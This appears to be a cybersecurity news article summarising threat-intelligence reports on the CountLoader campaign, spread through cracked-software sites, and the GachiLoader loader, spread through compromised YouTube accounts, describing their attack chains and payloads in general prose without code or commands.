A new cybersecurity research campaign has been revealed, utilizing cracked software distribution sites to distribute a new version of a stealthy loader called CountLoader.
The campaign utilizes CountLoader in a multistage attack for access, evasion, and delivery of additional malware families, according to an analysis by Cyderes Howler Cell Threat Intelligence team.
CountLoader, previously documented by Fortinet and Silent Push, is known for pushing payloads like Cobalt Strike, AdaptixC2, PureHVNC RAT, Amatera Stealer, and PureMiner. This loader has been active in the wild since at least June 2025.
The attack chain begins with unsuspecting users downloading cracked versions of legitimate software, leading them to a MediaFire link hosting a malicious ZIP archive. The ZIP file contains an encrypted file along with a Microsoft Word document containing the password to access the second archive.
Within the ZIP file is a renamed Python interpreter (“Setup.exe”) that executes a malicious command to retrieve CountLoader 3.2 from a remote server using “mshta.exe.”
To establish persistence, the malware creates a scheduled task named “GoogleTaskSystem136.0.7023.12” to run every 30 minutes for 10 years using “mshta.exe” with a fallback domain.
The malware checks for CrowdStrike’s Falcon security tool and adjusts the persistence command accordingly. It also has the capability to download and execute payloads, spread via removable drives, collect system information, and more.
The final payload deployed by CountLoader in the observed attack chain is an information stealer known as ACR Stealer.
YouTube Ghost Network Delivers GachiLoader
Check Point disclosed details of GachiLoader, a heavily obfuscated JavaScript malware loader distributed through the YouTube Ghost Network, a network of compromised YouTube accounts.
GachiLoader deploys a second-stage malware called Kidkadi, which uses a novel technique for PE injection to load a legitimate DLL and replace it with a malicious payload using Vectored Exception Handling.
As many as 100 YouTube videos have been flagged in the campaign, with GachiLoader also serving as a conduit for the Rhadamanthys information stealer malware.
GachiLoader performs anti-analysis checks, attempts to run with admin privileges, and tries to evade detection by security solutions like Microsoft Defender.
The malware utilizes various techniques to fetch and execute the final payload, demonstrating a need for security researchers to stay updated on malware evasion tactics.
